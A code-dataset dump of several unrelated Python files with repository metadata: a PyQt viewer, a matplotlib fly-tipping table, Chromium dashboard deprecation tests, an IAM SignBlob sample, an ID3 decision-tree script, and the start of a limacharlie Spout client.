            painter = QPainter()
            painter.begin(self.frame_qimg)
            pen = QPen()
            pen_width = 3
            pen.setWidth(pen_width)
            pen.setColor(Qt.red)
            painter.setPen(pen)
            painter.drawRect(1, 1, self.frame_qimg.width()-pen_width, self.frame_qimg.height()-pen_width);
            painter.end()
            print(1)  # NOTE(review): leftover debug print -- consider removing

        self.pixmap = QPixmap.fromImage(self.frame_qimg)
        self.ui.imageCanvas.setPixmap(self.pixmap);

    def changeSkelBlock(self, val):
        # Select skeleton block `val`, update the label, and jump to its start.
        self.skel_block_n = val

        if len(self.skel_block) > 0:
            self.ui.label_skelBlock.setText('Block limits: %i-%i' % (self.skel_block[self.skel_block_n]))
            #move to the frame where the block starts
            self.ui.spinBox_frame.setValue(self.skel_block[self.skel_block_n][0])
        else:
            self.ui.label_skelBlock.setText('')

    #change frame number using the keys
    def keyPressEvent(self, event):
        #go the previous block ('[' key, code 91)
        if event.key() == 91:
            self.ui.spinBox_skelBlock.setValue(self.skel_block_n-1)
        #go to the next block (']' key, code 93)
        elif event.key() == 93:
            self.ui.spinBox_skelBlock.setValue(self.skel_block_n+1)
        #toggle the show-label checkbox (';' key, code 59)
        elif event.key() == 59:
            if self.ui.checkBox_showLabel.isChecked():
                self.ui.checkBox_showLabel.setChecked(0)
            else:
                self.ui.checkBox_showLabel.setChecked(1)
        super().keyPressEvent(event)
if __name__ == '__main__':
    # Standalone launch: create the Qt application and show the viewer window.
    app = QApplication(sys.argv)
    ui = SWTrackerViewer_GUI()
    ui.show()
    sys.exit(app.exec_())
| [
"ver228@gmail.com"
] | ver228@gmail.com |
bf068617a07cc247a0e776ea487f6d60f4cbd555 | c36f43dc25cd7f2b52aa606f57bc9d690c248242 | /Python Data Visualisation/solutions/case_studies/case_study_d_flytipping.py | 84018bb1f60c90f74485d7dca81fab9fdfa71250 | [] | no_license | rachelchalmersCDDO/hello-git | 53a400f64ba49c84aca7afe0f4af9901effd753a | 0f72eceed31f503cea526785e8716321a7f31e78 | refs/heads/main | 2023-04-27T04:37:45.071999 | 2021-05-11T11:48:59 | 2021-05-11T11:48:59 | 366,358,490 | 0 | 0 | null | 2021-05-11T11:48:59 | 2021-05-11T11:31:10 | Jupyter Notebook | UTF-8 | Python | false | false | 2,630 | py | figure, axes = plt.subplots(figsize = (8,4)) # Set up our figure and axis
axes.axis("off") # Removes the axis from the figure
# Create the header - This is easiest to create as a new table with 1 row and position above our existing table.
header = plt.table(cellText=[["Number of fly-tipping incidents by waste type"]], cellLoc="left", loc="left",
bbox=[0.111, 0.97, 0.8098, 0.12]) # x, y , length, height
# Set the properties for this text box
for (row, col), cell in header.get_celld().items():
cell.set_text_props(fontproperties=FontProperties(family ="Arial", weight="bold", size = 14), ha = "left")
cell.set_edgecolor("black")
cell.set_linewidth(1)
cell.PAD = 0.01
# Create the Main Table
table = axes.table(cellText=flytipping.values, # Values we want in the cells
colLabels=flytipping.columns.str.replace(" ", "\n") , # Our column headers
loc="upper left", # Where we want our table located
edges="closed") # Draws a grid around the cells
# Set top row to Bold and make taller
for (row, col), cell in table.get_celld().items():
if (row == 0) or (col == -1):
cell.set_height(0.22)
cell.set_text_props(fontproperties=FontProperties(family="Arial", weight="bold", size=14),
ma="right", va="bottom")
cell.set_edgecolor("black")
cell.set_linewidth(1)
cell.PAD = 0.04
else:
cell.set_text_props(fontproperties=FontProperties(family="Arial", size=12), ma="right")
cell.set_edgecolor("black")
cell.set_linewidth(1)
cell.PAD=0.04
# Loop over column 1 and make bold
for (row, col), cell in table.get_celld().items():
if (col == 0):
cell.set_text_props(weight="bold")
# Loop over each column and auto set the width
for each_column in range(len(flytipping.columns)):
table.auto_set_column_width(each_column)
# Set Title and Captions
title = "Table 3.1 Types of other fly-tipping in England, 2011/12 to 2018/19 **"
plt.figtext(x=0.04, y=1.1, s=title, ha="left", fontweight="bold", fontsize=16, fontname="sans-serif")
caption = ("""* Other identified includes vehicle parts, animal carcasses, clinical waste, asbestos and ‘chemical drums, oil
and fuel’ \n
** Rounded to the nearest thousand
\n Equivalent figures for 2007/08 to 2010/11 can be seen in the accompanying dataset.""" )
plt.figtext(x=0.08, y=0.12, s=caption, ha="left", fontweight="light", fontsize=10, fontname="sans-serif")
# Set the layout to tight
figure.tight_layout() # Controls the amount of white space around the table | [
"rachel.chalmers@digital.cabinet-office.gov.uk"
] | rachel.chalmers@digital.cabinet-office.gov.uk |
65a76d10ad4faa3451c1076b45faf88e43b89b85 | 9bce32b47bd2f5d676e2c880febc31e0cd2ebada | /core/__init__.py | 0ec37ce465b51e237c214b819e8afab3d0832ce2 | [] | no_license | ranxiao/Predictive-Performance-Eval-Toolbox | fa4a29cac6a5fe870d427c3a137e1eee6ccc6bc7 | e97280c51b13f0d8a2c82ec393a73f64433d1674 | refs/heads/main | 2023-05-30T14:46:51.043669 | 2021-06-24T20:05:41 | 2021-06-24T20:05:41 | 314,012,246 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | from .processors import Process, run | [
"noreply@github.com"
] | noreply@github.com |
4ce90ed6b7934f21c3463432f8284e1baa696b8f | cc1b87f9368e96e9b3ecfd5e0822d0037e60ac69 | /dashboard/dashboard/deprecate_tests_test.py | 63b49de8e073633803e4351d0465573bfede7986 | [
"BSD-3-Clause"
] | permissive | CTJyeh/catapult | bd710fb413b9058a7eae6073fe97a502546bbefe | c98b1ee7e410b2fb2f7dc9e2eb01804cf7c94fcb | refs/heads/master | 2020-08-19T21:57:40.981513 | 2019-10-17T09:51:09 | 2019-10-17T18:30:16 | 215,957,813 | 1 | 0 | BSD-3-Clause | 2019-10-18T06:41:19 | 2019-10-18T06:41:17 | null | UTF-8 | Python | false | false | 9,522 | py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import datetime
import mock
import unittest
import webapp2
import webtest
from google.appengine.ext import ndb
from dashboard import deprecate_tests
from dashboard.common import testing_common
from dashboard.common import utils
_DEPRECATE_DAYS = deprecate_tests._DEPRECATION_REVISION_DELTA.days + 1
_REMOVAL_DAYS = deprecate_tests._REMOVAL_REVISON_DELTA.days + 1
_TESTS_SIMPLE = [
['ChromiumPerf'],
['mac'],
{
'SunSpider': {
'Total': {
't': {},
't_ref': {},
},
}
}
]
_TESTS_MULTIPLE = [
['ChromiumPerf'],
['mac'],
{
'SunSpider': {
'Total': {
't': {},
't_ref': {},
},
},
'OtherTest': {
'OtherMetric': {
'foo1': {},
'foo2': {},
},
},
}
]
_TESTS_MULTIPLE_MASTERS_AND_BOTS = [
['ChromiumPerf', 'ChromiumPerfFYI'],
['mac', 'linux'],
{
'SunSpider': {
'Total': {
't': {},
},
}
}
]
class DeprecateTestsTest(testing_common.TestCase):
    # Unit tests for the /deprecate_tests handler and the task-queue workers
    # it fans out to.

    def setUp(self):
        super(DeprecateTestsTest, self).setUp()
        app = webapp2.WSGIApplication([(
            '/deprecate_tests', deprecate_tests.DeprecateTestsHandler)])
        self.testapp = webtest.TestApp(app)
        # Small shard count keeps the task fan-out deterministic in tests.
        deprecate_tests._DEPRECATE_TESTS_PARALLEL_SHARDS = 2

    def _AddMockRows(self, test_path, age):
        """Adds sample TestMetadata and Row entities.

        Args:
            test_path: full test path string to attach rows to.
            age: age in days used for every row's timestamp.
        """
        # Add 50 Row entities to some of the tests.
        ts = datetime.datetime.now() - datetime.timedelta(days=age)
        data = {}
        for i in range(15000, 15100, 2):
            data[i] = {'value': 1, 'timestamp': ts}
        testing_common.AddRows(test_path, data)

    def AssertDeprecated(self, test_path, deprecated):
        # Assert the `deprecated` flag of the TestMetadata at test_path.
        test_key = utils.TestKey(test_path)
        test = test_key.get()
        self.assertEqual(test.deprecated, deprecated)

    @mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
    def testPost_DeprecateOldTest(self, mock_delete):
        # A test whose newest row is older than the deprecation delta is
        # marked deprecated; fresh siblings and the suite are not.
        testing_common.AddTests(*_TESTS_MULTIPLE)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', _DEPRECATE_DAYS)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t_ref', 0)
        self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo1', 0)
        self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo2', 0)
        self.testapp.post('/deprecate_tests')
        self.ExecuteTaskQueueTasks(
            '/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider', False)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t', True)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t_ref', False)
        self.assertFalse(mock_delete.called)

    @mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
    def testPost_DeprecateOldTestDeprecatesSuite(self, mock_delete):
        # When every subtest is stale the parent suite is deprecated too;
        # the suite itself is only caught on a second handler pass.
        testing_common.AddTests(*_TESTS_MULTIPLE)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', _DEPRECATE_DAYS)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t_ref', _DEPRECATE_DAYS)
        self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo1', 0)
        self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo2', 0)
        self.testapp.post('/deprecate_tests')
        self.ExecuteTaskQueueTasks(
            '/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        # Do a second pass to catch the suite
        self.testapp.post('/deprecate_tests')
        self.ExecuteTaskQueueTasks(
            '/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider', True)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t', True)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t_ref', True)
        self.assertFalse(mock_delete.called)

    @mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
    def testPost_DoesNotDeleteRowsWithChildren(self, mock_delete):
        # A stale test that still has child tests is deprecated but its data
        # must not be scheduled for deletion.
        testing_common.AddTests(*_TESTS_SIMPLE)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total', _REMOVAL_DAYS)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', 0)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t_ref', 0)
        self.testapp.post('/deprecate_tests')
        self.ExecuteTaskQueueTasks(
            '/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        # Do a second pass to catch the suite
        self.testapp.post('/deprecate_tests')
        self.ExecuteTaskQueueTasks(
            '/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider', False)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total', True)
        self.AssertDeprecated('ChromiumPerf/mac/SunSpider/Total/t', False)
        self.assertFalse(mock_delete.called)

    @mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
    def testPost_DeprecateOldTestDeletesData(self, mock_delete):
        # A leaf test older than the removal delta has its data deleted.
        testing_common.AddTests(*_TESTS_MULTIPLE)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', _REMOVAL_DAYS)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t_ref', 0)
        self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo1', 0)
        self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo2', 0)
        self.testapp.post('/deprecate_tests')
        self.ExecuteTaskQueueTasks(
            '/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        test = utils.TestKey('ChromiumPerf/mac/SunSpider/Total/t').get()
        mock_delete.assert_called_once_with(test)

    @mock.patch.object(deprecate_tests, '_AddDeleteTestDataTask')
    def testPost_DeletesTestsWithNoRowsOrChildren(self, mock_delete):
        # A leaf test with no rows and no children is scheduled for deletion.
        testing_common.AddTests(*_TESTS_MULTIPLE)
        self._AddMockRows('ChromiumPerf/mac/SunSpider/Total/t', 0)
        self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo1', 0)
        self._AddMockRows('ChromiumPerf/mac/OtherTest/OtherMetric/foo2', 0)
        self.testapp.post('/deprecate_tests')
        self.ExecuteTaskQueueTasks(
            '/deprecate_tests', deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        test = utils.TestKey('ChromiumPerf/mac/SunSpider/Total/t_ref').get()
        mock_delete.assert_called_once_with(test)

    @mock.patch.object(
        deprecate_tests, '_AddDeprecateTestDataTask', mock.MagicMock())
    def testPost_DeletesBot_NotMaster(self):
        # Removing every test under one bot deletes the Bot entity but keeps
        # the Master (its other bot still has tests).
        testing_common.AddTests(*_TESTS_MULTIPLE_MASTERS_AND_BOTS)
        utils.TestKey('ChromiumPerf/mac/SunSpider/Total/t').delete()
        utils.TestKey('ChromiumPerf/mac/SunSpider/Total').delete()
        utils.TestKey('ChromiumPerf/mac/SunSpider').delete()
        # Sanity check: all Master/Bot entities exist before the handler runs.
        for m in _TESTS_MULTIPLE_MASTERS_AND_BOTS[0]:
            for b in _TESTS_MULTIPLE_MASTERS_AND_BOTS[1]:
                master_key = ndb.Key('Master', m)
                bot_key = ndb.Key('Bot', b, parent=master_key)
                self.assertIsNotNone(bot_key.get())
                self.assertIsNotNone(master_key.get())
        self.testapp.get('/deprecate_tests')
        self.ExecuteDeferredTasks(deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        expected_deleted_bots = [ndb.Key('Master', 'ChromiumPerf', 'Bot', 'mac')]
        for m in _TESTS_MULTIPLE_MASTERS_AND_BOTS[0]:
            for b in _TESTS_MULTIPLE_MASTERS_AND_BOTS[1]:
                master_key = ndb.Key('Master', m)
                bot_key = ndb.Key('Bot', b, parent=master_key)
                if bot_key in expected_deleted_bots:
                    self.assertIsNone(bot_key.get())
                else:
                    self.assertIsNotNone(bot_key.get())
                self.assertIsNotNone(master_key.get())

    @mock.patch.object(
        deprecate_tests, '_AddDeprecateTestDataTask', mock.MagicMock())
    def testPost_DeletesMasterAndBot(self):
        # Removing every test under a master deletes both its Bots and the
        # Master entity itself.
        testing_common.AddTests(*_TESTS_MULTIPLE_MASTERS_AND_BOTS)
        utils.TestKey('ChromiumPerf/mac/SunSpider/Total/t').delete()
        utils.TestKey('ChromiumPerf/mac/SunSpider/Total').delete()
        utils.TestKey('ChromiumPerf/mac/SunSpider').delete()
        utils.TestKey('ChromiumPerf/linux/SunSpider/Total/t').delete()
        utils.TestKey('ChromiumPerf/linux/SunSpider/Total').delete()
        utils.TestKey('ChromiumPerf/linux/SunSpider').delete()
        # Sanity check: all Master/Bot entities exist before the handler runs.
        for m in _TESTS_MULTIPLE_MASTERS_AND_BOTS[0]:
            for b in _TESTS_MULTIPLE_MASTERS_AND_BOTS[1]:
                master_key = ndb.Key('Master', m)
                bot_key = ndb.Key('Bot', b, parent=master_key)
                self.assertIsNotNone(bot_key.get())
                self.assertIsNotNone(master_key.get())
        self.testapp.get('/deprecate_tests')
        self.ExecuteDeferredTasks(deprecate_tests._DEPRECATE_TESTS_TASK_QUEUE_NAME)
        expected_deleted_bots = [
            ndb.Key('Master', 'ChromiumPerf', 'Bot', 'mac'),
            ndb.Key('Master', 'ChromiumPerf', 'Bot', 'linux')]
        expected_deleted_masters = [ndb.Key('Master', 'ChromiumPerf')]
        for m in _TESTS_MULTIPLE_MASTERS_AND_BOTS[0]:
            master_key = ndb.Key('Master', m)
            if master_key in expected_deleted_masters:
                self.assertIsNone(master_key.get())
            else:
                self.assertIsNotNone(master_key.get())
            for b in _TESTS_MULTIPLE_MASTERS_AND_BOTS[1]:
                bot_key = ndb.Key('Bot', b, parent=master_key)
                if bot_key in expected_deleted_bots:
                    self.assertIsNone(bot_key.get())
                else:
                    self.assertIsNotNone(bot_key.get())
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
25e72161c8d4276d21d755c960750c74d408ce34 | 8f75dae40363144b7ea0eccb1b2fab804ee60711 | /tests/integration/goldens/credentials/samples/generated_samples/iamcredentials_v1_generated_iam_credentials_sign_blob_async.py | fffa6de4bc73a43e8c4de2347fdbc936e2ed972e | [
"Apache-2.0"
] | permissive | software-dov/gapic-generator-python | a2298c13b02bff87888c2949f4909880c3fa2408 | 304b30d3b4ec9ccb730251154b10896146a52900 | refs/heads/master | 2022-06-04T00:14:28.559534 | 2022-02-28T18:13:26 | 2022-02-28T18:13:26 | 191,990,527 | 0 | 1 | Apache-2.0 | 2022-01-27T19:35:04 | 2019-06-14T18:41:06 | Python | UTF-8 | Python | false | false | 1,491 | py | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for SignBlob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-iam-credentials
# [START iamcredentials_v1_generated_IAMCredentials_SignBlob_async]
from google.iam import credentials_v1
async def sample_sign_blob():
    """Call IAMCredentials.SignBlob with placeholder arguments and print the response.

    NOTE(review): generated sample -- replace "name_value" with a real
    service-account resource name before running.
    """
    # Create a client
    client = credentials_v1.IAMCredentialsAsyncClient()

    # Initialize request argument(s)
    request = credentials_v1.SignBlobRequest(
        name="name_value",
        payload=b'payload_blob',
    )

    # Make the request
    response = await client.sign_blob(request=request)

    # Handle the response
    print(response)
# [END iamcredentials_v1_generated_IAMCredentials_SignBlob_async]
| [
"noreply@github.com"
] | noreply@github.com |
aa2c753332ce7bf08b7e2a7efc44efcee9ed5542 | b10917820bac7e879c6e4b4a480d42e816675542 | /ID3_Decision Tree Algorithm.py | 564ee6850ac92bad323dd5f4c5c650e854cb00ab | [] | no_license | ronypy/ID3-Decision-Tree-algorithm | 8c753a3a6028dc7e29c70f77de7beae780b6a696 | f3ec2d34901297333125b0a15ce00b687e7776d3 | refs/heads/master | 2020-08-22T11:32:16.506272 | 2019-10-20T15:46:30 | 2019-10-20T15:46:30 | 216,385,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,450 | py | import csv
import math
# from operator import add
'''
readAllSamples is a user defined function. It is used to read all the sample of CSV file. It takes filename as an argument as well as test row count to make a test set from the file. This function returns a train set and a test set.
'''
def readAllSamples(fileName, test_row_count, Del_colm):
    """Read every sample from an open CSV file and split into train/test sets.

    Args:
        fileName: an open file object (or any iterable of CSV lines).
        test_row_count: number of rows, taken from the end, used as the test set.
        Del_colm: number of leading columns to drop from every row (0 keeps all).

    Returns:
        (trainSet, testSet, headers): the two row lists plus the kept
        column names from the header row.
    """
    rows = list(csv.reader(fileName))
    # Robustness fix: the original crashed (IndexError) on an empty file.
    if not rows:
        return [], [], []
    # Column names for the kept columns.
    headers = rows[0][Del_colm:]
    # Bug fix: the original sliced columns with the ROW count
    # (g[i][Del_colm:(len(g) - 1)]), so the number of data rows silently
    # decided which columns were kept. Keep every column from Del_colm on.
    samples = [row[Del_colm:] for row in rows[1:]]
    # The last test_row_count rows become the test set.
    split_at = len(samples) - test_row_count
    trainSet = samples[:split_at]
    testSet = samples[split_at:]
    return trainSet, testSet, headers
# Script entry: open the dataset, then interactively ask for the test-set size
# and an optional count of leading columns to exclude from gain calculation.
f1 = open("Book1.csv", newline='')
test_row = int(input("please provide how many rows you want as test set\n"))
Del_colm = int(input(
    "is there any column you want to exclude during gain calculation? if any, please provide column number, otherwise please provide Zero(0) \n"))
train_set, test_set, headers = readAllSamples(f1, test_row, Del_colm)
'''
This is entropy function. It takes table as input and finds out entropy.
'''
def entropy(table):
    """Shannon entropy (base 2) of the decision attribute.

    The decision attribute is the last column of every row, as elsewhere
    in this module.

    Args:
        table: list of rows (lists); row[-1] is the class label.

    Returns:
        Entropy in bits; 0 for an empty table or a table with a single
        class (matching the original behaviour for pure tables).
    """
    # Robustness fix: the original indexed table[0] and raised IndexError
    # when given an empty table.
    if not table:
        return 0
    # Count how many rows carry each class label (single pass, instead of
    # the original list/set/count passes).
    counts = {}
    for row in table:
        label = row[-1]
        counts[label] = counts.get(label, 0) + 1
    if len(counts) == 1:
        # A pure table (only one class) has zero entropy.
        return 0
    total = len(table)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())
'''
informationGain is an user defined function. it takes table, the attribute for which we want to find out entropy and total entropy of the table as input. It returns gain of the attribute.
'''
def informationGain(table, attribute, total_entropy):
    """Information gain obtained by splitting `table` on one attribute.

    Args:
        table: list of rows (lists); row[-1] is the class label.
        attribute: index of the column to split on.
        total_entropy: entropy of the whole table before the split.

    Returns:
        total_entropy minus the weighted entropy of the value subsets.
    """
    # Robustness fix: the original crashed on an empty table.
    if not table:
        return 0
    # Single pass: per attribute value, count the class labels of its rows.
    # (The original made one pass per distinct value and built several
    # intermediate merged lists -- O(k*n) instead of O(n).)
    groups = {}
    for row in table:
        labels = groups.setdefault(row[attribute], {})
        label = row[-1]
        labels[label] = labels.get(label, 0) + 1
    total_rows = len(table)
    weighted_entropy = 0.0
    for labels in groups.values():
        subset_size = sum(labels.values())
        if len(labels) > 1:  # a pure subset contributes zero entropy
            subset_entropy = -sum(
                (n / subset_size) * math.log2(n / subset_size)
                for n in labels.values())
            weighted_entropy += (subset_size / total_rows) * subset_entropy
    return total_entropy - weighted_entropy
# Finding out column of maximum gain
def gainMatrix(train_set, total_entropy):
    """Return the index of the attribute column with the highest gain.

    The last column (the decision attribute) is excluded from the
    candidates.
    """
    n_attributes = len(train_set[0]) - 1
    gains = [informationGain(train_set, col, total_entropy)
             for col in range(n_attributes)]
    # index() of the max keeps the original first-maximum tie-breaking.
    return gains.index(max(gains))
# This function splits the data on the chosen attribute and recursively
# prints the ID3 decision tree.
def splitData(train_set, max_gain_column, headers, counter):
    """Partition train_set by the values of max_gain_column and recurse.

    Args:
        train_set: list of rows; row[-1] is the class label.
        max_gain_column: index of the attribute chosen for this node.
        headers: column names, used only for printing the tree.
        counter: column index used to label branch values when printing.
            NOTE(review): the `counter`/`k` hand-off between recursion levels
            looks fragile -- verify the printed branch labels are correct.

    Returns:
        tuple of child subsets (one per attribute value), sorted.
    """
    # Distinct values taken by the splitting attribute.
    set_max_gain_column = []
    for i in range(len(train_set)):
        set_max_gain_column.append(train_set[i][max_gain_column])
    set_max_gain_column = list(set(set_max_gain_column))
    new_train_set = []    # unused
    child_root_gain = []  # unused
    # One child subset per distinct attribute value.
    child = [[] for i in range(len(set_max_gain_column))]
    for j in range(len(set_max_gain_column)):
        for i in range(len(train_set)):
            if (train_set[i][max_gain_column] == set_max_gain_column[j]):
                child[j].append(train_set[i])
    k = counter
    # Entropy of each child subset.
    ent = []
    for i in range(len(child)):
        ent.append(entropy(child[i]))
    # Sort the children (paired with their entropies) for a stable print order.
    child, ent = zip(*sorted(zip(child, ent)))
    for i in range(len(child)):
        root_child_entropy = entropy(child[i])
        max_gain_column = gainMatrix(child[i], root_child_entropy)
        if root_child_entropy == 0:
            # Pure subset: this branch ends in a leaf decision.
            print(
                "For {} {}, decision will be {}".format(headers[k], child[i][0][k], child[i][0][len(child[i][0]) - 1]))
        else:
            # Impure subset: pick the next best attribute and recurse.
            k = gainMatrix(child[i], root_child_entropy)
            print("child_root will be {} ".format(headers[max_gain_column]))
            splitData(child[i], max_gain_column, headers, k)
    return child
# Build and print the tree: the root is the attribute with the highest gain.
total_entropy = entropy(train_set)
xx = gainMatrix(train_set, total_entropy)
print("root will be {}".format(headers[xx]))
counter = 0
pp = splitData(train_set, xx, headers, counter)
# the end
| [
"noreply@github.com"
] | noreply@github.com |
14759c80b4c7aa5733b45151693919130262ebcd | 25ba2f7256c15ed23c129837380f340ad56a932e | /limacharlie/Spout.py | 75852122d299f39e84f6d61556da862e9d22b141 | [
"Apache-2.0"
] | permissive | macdaliot/python-limacharlie | c60d4b5d7a7a8985bc67208b88b5fa0748866fd3 | dc8011418f09d3acc0ebce5ea3afb98e4b7f600f | refs/heads/master | 2021-06-17T08:27:28.358390 | 2018-11-25T15:09:33 | 2018-11-25T15:09:33 | 161,183,497 | 0 | 0 | Apache-2.0 | 2021-02-09T18:28:39 | 2018-12-10T14:00:08 | Python | UTF-8 | Python | false | false | 10,197 | py | from gevent import monkey; monkey.patch_all()
from gevent.queue import Queue
import gevent.pool
import sys
import json
import requests
import os
import traceback
import uuid
import time
from .utils import *
# The cloud emits a keep-alive roughly every 60 seconds; only time out after
# missing two consecutive keep-alives (plus a one-second grace period).
_CLOUD_KEEP_ALIVES = 60
_TIMEOUT_SEC = ( _CLOUD_KEEP_ALIVES * 2 ) + 1
class Spout( object ):
'''Listener object to receive data (Events, Detects or Audit) from a limacharlie.io Organization in pull mode.'''
    def __init__( self, man, data_type, is_parse = True, max_buffer = 1024, inv_id = None, tag = None, cat = None, sid = None, extra_params = {} ):
        '''Connect to limacharlie.io to start receiving data.

        Args:
            man (limacharlie.Manager obj): a Manager to use for interaction with limacharlie.io.
            data_type (str): the type of data received from the cloud as specified in Outputs (event, detect, audit).
            is_parse (bool): if set to True (default) the data will be parsed as JSON to native Python.
            max_buffer (int): the maximum number of messages to buffer in the queue.
            inv_id (str): only receive events marked with this investigation ID.
            tag (str): only receive Events from Sensors with this Tag.
            cat (str): only receive Detections of this Category.
            sid (str): only receive Events or Detections from this Sensor.
            extra_params (dict): extra values merged into the Output parameters sent to the cloud.
        '''
        # NOTE(review): extra_params uses a mutable default argument; it is
        # only read here (never mutated) so this is safe, but a None default
        # would be more conventional.
        self._man = man
        self._oid = man._oid
        self._data_type = data_type
        self._cat = cat
        self._tag = tag
        self._invId = inv_id
        self._sid = sid
        self._is_parse = is_parse
        self._max_buffer = max_buffer
        # Number of messages discarded because the local queue was full.
        self._dropped = 0
        self._isStop = False
        # This is used to register FutureResults objects where data should go
        # based on the full value of an investigation ID (including the custom tracking after "/").
        self._futures = {}

        if self._data_type not in ( 'event', 'detect', 'audit' ):
            raise LcApiException( 'Invalid data type: %s' % self._data_type )

        # Setup internal structures.
        self.queue = Queue( maxsize = self._max_buffer )
        self._threads = gevent.pool.Group()

        # Connect to limacharlie.io.
        spoutParams = { 'type' : self._data_type }
        # Prefer the long-lived API key when available, otherwise use the JWT.
        if man._secret_api_key:
            spoutParams[ 'api_key' ] = man._secret_api_key
        else:
            spoutParams[ 'jwt' ] = man._jwt
        if inv_id is not None:
            spoutParams[ 'inv_id' ] = self._invId
        if tag is not None:
            spoutParams[ 'tag' ] = self._tag
        if cat is not None:
            spoutParams[ 'cat' ] = self._cat
        if sid is not None:
            spoutParams[ 'sid' ] = self._sid
        # NOTE(review): iteritems() is Python 2 only; under Python 3 this
        # line would need .items().
        for k, v in extra_params.iteritems():
            spoutParams[ k ] = v

        # Spouts work by doing a POST to the output.limacharlie.io service with the
        # OID, Secret Key and any Output parameters we want. This POST will return
        # us an HTTP 303 See Other with the actual URL where the output will be
        # created for us. We take note of this redirect URL so that if need to
        # reconnect later we don't need to re-do the POST again. The redirected URL
        # contains a path with a randomized value which is what we use a short term
        # shared secret to get the data stream since we are not limiting connections
        # by IP.
        self._hConn = requests.post( 'https://output.limacharlie.io/output/%s' % ( self._oid, ),
                                     data = spoutParams,
                                     stream = True,
                                     allow_redirects = True,
                                     timeout = _TIMEOUT_SEC )

        if self._hConn.status_code != 200:
            raise LcApiException( 'failed to open Spout: %s' % self._hConn.text )

        # Remember the redirected URL so later reconnects can skip the POST.
        self._finalSpoutUrl = self._hConn.history[ 0 ].headers[ 'Location' ]

        # Start the reader greenlet and the periodic cleanup of expired futures.
        self._threads.add( gevent.spawn( self._handleConnection ) )
        self._futureCleanupInterval = 30
        self._threads.add( gevent.spawn_later( self._futureCleanupInterval, self._cleanupFutures ) )
def _cleanupFutures( self ):
now = time.time()
for trackingId, futureInfo in self._futures.items():
ttl = futureInfo[ 1 ]
if ttl < now:
self._futures.pop( trackingId, None )
self._threads.add( gevent.spawn_later( self._futureCleanupInterval, self._cleanupFutures ) )
def shutdown( self ):
'''Stop receiving data.'''
self._isStop = True
if self._hConn is not None:
self._hConn.close()
self._threads.join( timeout = 2 )
def getDropped( self ):
'''Get the number of messages dropped because queue was full.'''
return self._dropped
def resetDroppedCounter( self ):
'''Reset the counter of dropped messages.'''
self._dropped = 0
def registerFutureResults( self, tracking_id, future, ttl = ( 60 * 60 * 1 ) ):
'''Register a FutureResults to receive events coming with a specific tracking ID and investigation ID.
Args:
tracking_id (str): the full value of the investigation_id field to match on, including the custom tracking after the "/".
future (limacharlie.FutureResults): future to receive the events.
ttl (int): number of seconds this future should be tracked.
'''
self._futures[ tracking_id ] = ( future, time.time() + ttl )
    def _handleConnection( self ):
        # Reader loop: consume lines from the streaming HTTP response until
        # shutdown, routing parsed messages either to a registered future or
        # to the public queue; reconnects to the saved redirect URL on drop.
        while not self._isStop:
            self._man._printDebug( "Stream started." )
            try:
                for line in self._hConn.iter_lines( chunk_size = 1024 * 1024 * 10 ):
                    try:
                        if self._is_parse:
                            line = json.loads( line )
